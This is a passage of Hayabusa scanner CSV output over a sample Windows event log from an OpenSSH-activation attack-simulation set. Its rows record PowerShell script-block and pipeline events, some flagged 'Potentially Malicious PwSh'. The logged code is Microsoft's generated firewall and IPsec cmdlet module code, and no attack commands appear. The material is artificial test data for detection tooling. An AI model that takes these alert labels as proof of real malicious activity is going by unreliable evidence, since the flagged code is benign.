'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh 
Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.217 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.220 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.222 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 
19:19:38.250 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.250 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { 